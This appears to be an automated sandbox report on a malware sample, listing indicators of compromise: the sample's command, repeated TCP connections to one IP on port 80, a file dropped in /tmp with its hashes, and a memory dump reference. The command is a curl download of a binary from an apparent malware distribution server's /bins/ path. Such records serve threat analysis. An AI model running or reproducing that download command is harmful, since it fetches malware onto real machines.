[curl -O http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/778-1-0xb66f4000-0xb6705044-memory.dmp